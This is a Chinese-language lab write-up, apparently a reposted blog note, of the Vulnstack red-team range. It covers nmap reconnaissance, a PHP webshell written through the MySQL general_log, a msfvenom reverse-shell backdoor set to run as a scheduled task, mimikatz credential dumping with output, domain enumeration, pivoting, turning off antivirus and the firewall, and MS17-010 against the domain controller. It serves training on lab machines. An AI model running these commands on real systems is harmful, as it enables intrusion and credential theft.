admin管理员组文章数量:1330725
Vulnstack 红队(一)
靶机为红日安全分享的靶机
靶机下载地址:http://vulnstack.qiyuanxuetang/vuln/detail/2/
笔记参考资料如下:
CSDN——谢公子
FreeBuf——红日安全团队专栏
CSDN——assless
序
本次网络环境为两个虚拟网络。
192.168.72.0/24为模拟公网环境。(Vmnet2)
192.168.52.0/24为模拟内网环境。(Vmnet1)
攻击者机器与win7的第一张网卡处于Vmnet1。(模拟公网)
win7的另一张网卡与win2k3、win2k8处于Vmnet1。(模拟内网)
首先需要测试网段与网段内是否可以正常通信。
注意!win7在未关闭防火墙时,它可以与其他机器正常通信,但是其他机器会无法使用Ping命令与win7进行通信。
预设步骤如下:
-
信息收集;
-
漏洞利用;
-
内网横向渗透;
3.1 内网信息收集;
3.2 内网的漏洞利用。 -
报告总结。(本笔记没有)
信息收集
第一步使用Nmap进行存活主机探测:
nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4
根据结果可以得知
root@AnranNewKali001:~# nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4
Starting Nmap 7.80 ( https://nmap ) at 2020-05-30 22:58 CST
Nmap scan report for 192.168.72.1
Host is up (0.00023s latency).
PORT STATE SERVICE
137/udp open netbios-ns
MAC Address: 00:50:56:C0:00:0C (VMware)
Host script results:
| nbstat: NetBIOS name: DESKTOP-MMVB7A9, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:c0:00:0c (VMware)
| Names:
| DESKTOP-MMVB7A9<20> Flags: <unique><active>
| DESKTOP-MMVB7A9<00> Flags: <unique><active>
|_ STUDYGROUP<00> Flags: <group><active>
Nmap scan report for 192.168.72.129
Host is up (0.00057s latency).
PORT STATE SERVICE
137/udp open netbios-ns
MAC Address: 00:0C:29:C4:33:DF (VMware)
Host script results:
| nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| Names:
| STU1<20> Flags: <unique><active>
| STU1<00> Flags: <unique><active>
| GOD<00> Flags: <group><active>
| GOD<1e> Flags: <group><active>
| GOD<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
Nmap scan report for 192.168.72.254
Host is up (0.00013s latency).
PORT STATE SERVICE
137/udp open|filtered netbios-ns
MAC Address: 00:50:56:E6:D6:C6 (VMware)
Nmap scan report for 192.168.72.128
Host is up (0.00015s latency).
PORT STATE SERVICE
137/udp closed netbios-ns
Nmap done: 256 IP addresses (4 hosts up) scanned in 32.49 seconds
root@AnranNewKali001:~# nmap -Pn 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:18 CST
Nmap done: 1 IP address (0 hosts up) scanned in 0.50 seconds
暴露在外网的主机为192.168.72.129
使用Nmap扫描开放的端口
root@AnranNewKali001:~# nmap -sC -sV -Pn -p 1-65535 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:21 CST
Stats: 0:02:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 09:24 (0:00:00 remaining)
Nmap scan report for 192.168.72.129
Host is up (0.00089s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1031/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
48478/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:C4:33:DF (VMware)
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-31T01:23:41
|_ start_date: 2020-05-30T14:30:21
Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.49 seconds
意识到可以在80、139、445这三个端口进行测试。
目前有两个渗透方向,分别为web服务和msf的漏洞利用。
下面可以使用御剑等工具进行目录扫描。
漏洞利用
写入木马后门
发现有phpmyadmin和yxcms
方法一:使用mysql写shell
phpmyadmin可以mysql日志写shell
数据库存在弱口令
root
root
show variables like '%general%'; #查看日志状
SET GLOBAL general_log='on' #开启general
set global general_log_file='C:/phpstudy/www/yxcms/backdoor.php'; #将路径改为
SELECT "<?PHP @EVAL($_POST['zyx']);?>" #一句话木马
操作完成后可使用蚁剑进行连接
方法二:从yxcms着手
登陆后发现有默认密码,登陆管理后台。
之后在后台发现可以改写默认模板
保存后使用蚁剑测试
内网信息收集
msf自动编写后门
这里可以使用msf生成后门文件使用蚁剑上传,并添加计划任务。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=10086 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe
windows添加计划任务
schtasks /create /tn solrindex(计划任务名) /tr C:\backdoor.exe /sc minute /mo 1(windows添加计划任务每分钟执行一次)
schtasks /delete /TN solrindex(任务名)/F(删除计划任务)
参考资料为CSDN——assless
添加计划任务后可以使用msf进行监听
msf5 > use multi/handler
#之后根据生成木马的命令进行payload的选择和设置
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
#当计划任务被执行的时候,会有会话被msf接收。
提权与加固后门
使用background保存会话后,可以使用sessions -u 1来将会话1变成meterpreter并保存为会话2
在meterpreter下使用getsystem进行提权
之后可以将会话所在id进行迁移(尽量选择64为程序)
migrate pid
获取密码
有时候meterpreter会出现乱码的情况使用chcp 65001即可解决
之后加载mimikatz。
meterpreter > load mimikatz
meterpreter > help mimikatz
Mimikatz Commands
=================
Command Description
------- -----------
kerberos Attempt to retrieve kerberos creds.
livessp Attempt to retrieve livessp creds.
mimikatz_command Run a custom command.
msv Attempt to retrieve msv creds (hashes).
ssp Attempt to retrieve ssp creds.
tspkg Attempt to retrieve tspkg creds.
wdigest Attempt to retrieve wdigest creds.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;51993 NTLM
0;2492365 Kerberos GOD Administrator hongrisec@2019
0;996 Negotiate GOD STU1$ df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
0;999 Negotiate GOD STU1$ df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
获得了administrator的密码。
判断网络
模拟公网:192.168.72.0/24
模拟内网:192.168.52.0/24
判断域信息
net time /domain #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain #查看域用户
net view /domain #查看有几个域
ipconfig /all #查询本机IP段,所在域等
net config Workstation #当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user #本机用户列表
net group "domain computers" /domain #查看域内所有的主机名
net group "domain admins" /domain #查看域管理员
net group "domain controllers" /domain #查看域控
net localhroup administrators (此条无法使用) #本机管理员[通常含有域用户]
net user 用户名 /domain #获取指定用户的账户信息
net group /domain #查询域里面的工作组
net group 组名 /domain #查询域中的某工作组
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : stu1
Primary Dns Suffix . . . . . . . : god.org
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : god.org
localdomain
Ethernet adapter �������� 4:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
Physical Address. . . . . . . . . : 00-0C-29-51-92-E5
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::d527:9f93:47b9:c7ae%25(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.72.130(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : 2020��5��31�� 20:12:47
Lease Expires . . . . . . . . . . : 2020��5��31�� 21:27:48
Default Gateway . . . . . . . . . :
DHCP Server . . . . . . . . . . . : 192.168.72.254
DHCPv6 IAID . . . . . . . . . . . : 721423401
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.72.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter Npcap Loopback Adapter:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Npcap Loopback Adapter
Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%24(Preferred)
Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :
DHCPv6 IAID . . . . . . . . . . . : 268566604
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
fec0:0:0:ffff::2%1
fec0:0:0:ffff::3%1
NetBIOS over Tcpip. . . . . . . . : Enabled
Ethernet adapter �������� 3:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Windows Adapter V9 #2
Physical Address. . . . . . . . . : 00-FF-56-0B-EA-FC
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter �������� 2:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : TAP-Windows Adapter V9
Physical Address. . . . . . . . . : 00-FF-44-8D-CB-B5
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter Bluetooth ��������:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Bluetooth �豸(����������)
Physical Address. . . . . . . . . : 90-78-41-5E-DD-FE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter ��������:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-51-92-DB
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::9522:e298:7366:33d9%11(Preferred)
IPv4 Address. . . . . . . . . . . : 192.168.52.143(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.52.2
DHCPv6 IAID . . . . . . . . . . . : 234884137
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
DNS Servers . . . . . . . . . . . : 192.168.52.138
8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{448DCBB5-7D61-4538-9C03-66B5CDAD1222}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #4
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{560BEAFC-DAC4-4687-A564-57790875DC43}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #5
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter isatap.{43AF3215-AAB6-4AA1-B776-739F7D787259}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #6
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
其中第5条meterpreter中运行失败,可以在蚁剑中使用。
C:\Windows\system32>net time /domain
net time /domain
Current time at \\owa.god.org is 2020/5/31 21:19:39
The command completed successfully.
C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain god.org.
User accounts for \\owa.god.org
-------------------------------------------------------------------------------
Administrator Guest krbtgt
ligang liukaifeng01
The command completed with one or more errors.
C:\Windows\system32>net view /domain
net view /domain
Domain
-------------------------------------------------------------------------------
GOD
The command completed successfully.
C:\Windows\system32>net config Workstation
net config Workstation
System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated.
C:\> net config Workstation
计算机名 \\STU1
计算机全名 stu1.god.org
用户名 Administrator
工作站正运行于
NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C295192DB)
NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C295192E5)
NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本 Windows 7 Professional
工作站域 GOD
工作站域 DNS 名称 god.org
登录域 GOD
COM 打开超时 (秒) 0
COM 发送计数 (字节) 16
COM 发送超时 (毫秒) 250
命令成功完成。
C:\Windows\system32>net group "domain controllers" /domain
net group "domain controllers" /domain
The request will be processed at a domain controller for domain god.org.
Group name Domain Controllers
Comment ����������������
Members
-------------------------------------------------------------------------------
OWA$
The command completed successfully.
C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain god.org.
Group name Domain Admins
Comment ����������Ա
Members
-------------------------------------------------------------------------------
Administrator OWA$
The command completed successfully.
C:\Windows\system32>net group "domain computers" /domain
net group "domain computers" /domain
The request will be processed at a domain controller for domain god.org.
Group name Domain Computers
Comment ���뵽���е����й���վ�ͷ�����
Members
-------------------------------------------------------------------------------
DEV1$ ROOT-TVI862UBEH$ STU1$
The command completed successfully.
C:\Windows\system32>net config Workstation
net config Workstation
System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated.
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest liukaifeng01
The command completed with one or more errors.
C:\Windows\system32>net user
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest liukaifeng01
The command completed with one or more errors.
C:\Windows\system32>net localhroup administrators
net localhroup administrators
The syntax of this command is:
NET
[ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
STATISTICS | STOP | TIME | USE | USER | VIEW ]
C:\Windows\system32>net view
net view
Server Name Remark
-------------------------------------------------------------------------------
\\OWA
\\ROOT-TVI862UBEH
The command completed successfully.
整理后信息如下:
域名:god
域内有三个用户:Administrator、ligang、liukaifeng01
域内三台主机:ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)、OWA
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143
添加内网路由
run get_local_subnets #获取内网信息
#在全局给指定的session增删路由
route add 192.168.52.0 255.255.255.0 1 #在session1中添加到达192.168.51.0网段的路由
route add 192.168.72.0 255.255.255.0 1 #在session1中添加到达192.168.72.0网段的路由
route add 0.0.0.0 0.0.0.0 1 #在session1中添加到达0.0.0.0/24网段的路由
route del 192.168.52.0 255.255.255.0 2 #在session2中删除到达192.168.52.0网段的路由
route print #打印路由信息
#也可以在进入session下添加路由
run autoroute -s 192.168.52.0/24 #添加到达192.168.52.0网段的路由
run autoroute -s 192.168.72.0/24 #添加到达192.168.72.0网段的路由
run autoroute -s 0.0.0.0/0 #添加到达0.0.0.0/0的路由
run autoroute -p #打印路由信息
Post 后渗透模块
run post/windows/manage/migrate #自动进程迁移
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上
run post/windows/manage/killav #关闭杀毒软件
run post/windows/manage/enable_rdp #开启远程桌面服务
run post/windows/manage/autoroute #查看路由信息
run post/windows/gather/enum_logged_on_users #列举当前登录的用户
run post/windows/gather/enum_applications #列举应用程序
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
run post/windows/gather/smart_hashdump #dump出所有用户的hash
run getgui -u hack -p 123
有时候无法使用后渗透模块添加用户
可以使用shell自主添加
net user hack Zyx960706 /add
net localgroup administrator hack /add
netsh advfirewall set allprofiles state off #关闭防火墙
net stop windefend
域内存活主机探测(系统、端口)
auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描(1-10000),如果开放了端口,则说明该主机存活
已经探测出138、141、143。
端口扫描
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描(1-10000)
auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
端口扫描有时会使会话终端,所以可以上传nmap后在shell中使用nmap扫描。但是要记得清理
服务扫描
auxiliary/scanner/ftp/ftp_version #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title #探测内网http服务的标题
auxiliary/scanner/smb/smb_version #发现内网smb服务,基于默认的445端口
use auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字
扫描结果如下:
C:\Nmap>nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138
nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138
Starting Nmap 7.00 ( https://nmap.org ) at 2020-06-02 09:45 ?D1��������?����??
Nmap scan report for 192.168.52.138
Host is up (0.0027s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds (primary domain: GOD)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port445-TCP:V=7.00%I=7%D=6/2%Time=5ED5AFB0%P=i686-pc-windows-windows%r(
SF:SMBProgNeg,61,"\0\0\0\]\xffSMBr\0\0\0\0\x88\x01@\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0@\x06\0\0\x01\0\x11\x07\0\x0f2\0\x01\0\x04A\0\0\0\0\x01\0\0\0\0\0\
SF:xfc\xf3\x01\0J{\xd5\xc2\x7f8\xd6\x01\x20\xfe\x08\x18\0\x88\xed\xe6R\x94
SF:\xff\xdd\xffG\0O\0D\0\0\0O\0W\0A\0\0\0");
MAC Address: 00:0C:29:5C:30:26 (VMware)
Service Info: Host: OWA; OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98
Host script results:
|_nbstat: NetBIOS name: OWA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:5c:30:26 (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: owa
| NetBIOS computer name: OWA
| Domain name: god.org
| Forest name: god.org
| FQDN: owa.god.org
|_ System time: 2020-06-02T09:48:12+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.61 seconds
漏洞利用
use exploit/windows/smb/ms17_010_psexec
DC已经拿下了,这个靶机很简单适合新手打完DVWA和pikachu之后不想进行
本文标签: Vulnstack
版权声明:本文标题:Vulnstack 红队(一) 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.betaflare.com/biancheng/1742238254a2438470.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论